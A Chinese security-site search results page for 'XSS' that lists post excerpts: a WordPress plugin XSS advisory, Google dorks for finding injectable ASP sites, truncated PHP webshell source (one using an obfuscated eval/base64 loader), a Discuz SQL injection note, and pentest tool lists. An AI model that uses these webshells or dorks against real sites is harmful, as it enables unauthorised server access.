搜索 “XSS”

不再关注网络安全

WordPress Count per Day Plugin 3.5.4 – Stored Cross-Site Scripting

  • 2016-08-22
  • Vulndb
  • 2214 阅读

EDB-ID: 40206 Author: Julien Rentrop CVE: N/A Published: 2016-08-05 Type: webapps Platform: PHP Stored Cross-Site Scripting vulnerability in Count per Day WordPress Plugin Abstract A Cross-Site Scripting vulnerability was found in the Count per Da...

Github 安全类Repo收集整理

Github 安全类Repo收集整理

刚好这两天对之前github上关注的一些比较有意思的项目进行了一下分类整理,在这里列出来分享给大家,希望能对大家寻找工具或者资源有所帮助。 大部分Repo是关于网络安全以及Python的,也有一些其他主题的项目,有很多我都没有用过,关于项目的功能概括如果写的有不对的地方,还请大家多多包涵,给予指正。 欢迎组团欢迎一起学习交流!转载请...

代码审计利器之自动化工具

代码审计利器之自动化工具

0x01 简介 工欲善其事,必先利其器。在源代码的静态安全审计中,使用自动化工具代替人工漏洞挖掘,可以显著提高审计工作的效率。学会利用自动化代码审计工具,是每一个代码审计人员必备的能力。在学习PHP源代码审计的过程中,本人搜集使用了多款自动化工具。本文将简要介绍其中三款比较实用的工具:RIPS、VCG、Fortify SCA。 RIPS是一款开源...

intext:"Hello visitor from" ext:asp

  • 2016-06-23
  • shdb
  • 1524 阅读

intext:"Hello visitor from" ext:asp atawho - sonadam - antidote details https://monodram.net/2015/10/10/user-agent-xss-inj.html

inurl:".asp?strParents="

  • 2016-03-28
  • shdb
  • 1854 阅读

Author: Charley Celice (@charleycelice) 99% of sites I found using this dork are vulnerable to XSS attacks. The "strParents" parameter seems to always be injectable. Example: https://example/whatever.asp?strParents= "/>&CAT_I...

Crack8_PHP webshell

Crack8_PHP webshell

PHP <?php /** * Created by uedbox.com. * User: hackgyj * Date: 15/10/28 * Time: 下午8:59 */ $admin['pass'] = "lqx"; //设置密码 $notice = "<FONT color=#ff3300>Crack8_PHP木马</font>"; //设置版权 eval(gzuncompress(base64_decode("eJzsffl3G8eR8M/0e/4fRhOuAJog...

404.php webshell

PHP <?php /** * Created by uedbox.com. * User: hackgyj * Date: 15/10/26 * Time: 下午4:40 */ @session_start(); @set_time_limit( 0 ); @error_reporting( 0 ); $salt = "silic1234"; $psw = trim...

Kali2.0正式发布,Kali2.0下载

Kali2.0正式发布,Kali2.0下载

  • 2015-08-12
  • 周边
  • 3082 阅读

Kali 2.0昨天已经在BlackHat 2015 USA上正式发布了。无论是粉丝们还是Kali官方都对这个2.0版本抱有极大的期待和热情。这是第一个基于Debian Jessie的Kali版本,此次升级最大的特点就是系统界面的设计理念更加先进,以及系统的升级方式变为滚动升级。 官方的Kali2.0介绍 1.将会保持滚动升级。 这是Kali 2.0最...

Discuz <= 7.2 SQL未公开注入漏洞

Discuz <= 7.2 SQL未公开注入漏洞

  • 2014-07-05
  • Vulndb
  • 2044 阅读

据说是某数字公司的应急给发布出来了.群里面的小伙伴都惊呆了 具体的漏洞分析看:http://www.80vul.com/webzine_0x06/PSTZine_0x06_0x03.txt 其中的 PHP 在《高级PHP应用程序漏洞审核技术》[1]一文里的"魔术引号带来的新的安全问题"一节里,有 提到通过提取魔术引号产生的“\”字符带来的安全问题,同样这个问题...

Android渗透测试工具大合集

Android渗透测试工具大合集

前话 当我们连入一个莫名的WIFI,除了上网,还能干些什么? 当然是渗透!已不至于只能上网 Android传承着Linux的血统,无疑使 渗透 从机器端到各种终端,使用起来更加方便,工具集中了众多方法,大大提高了渗透的效率(当然 不推荐傻瓜式工具,这里只是入门,高手勿喷,初学者了解) 大名鼎鼎的dsploit 地址: http://dsploit.net/ 演示视频...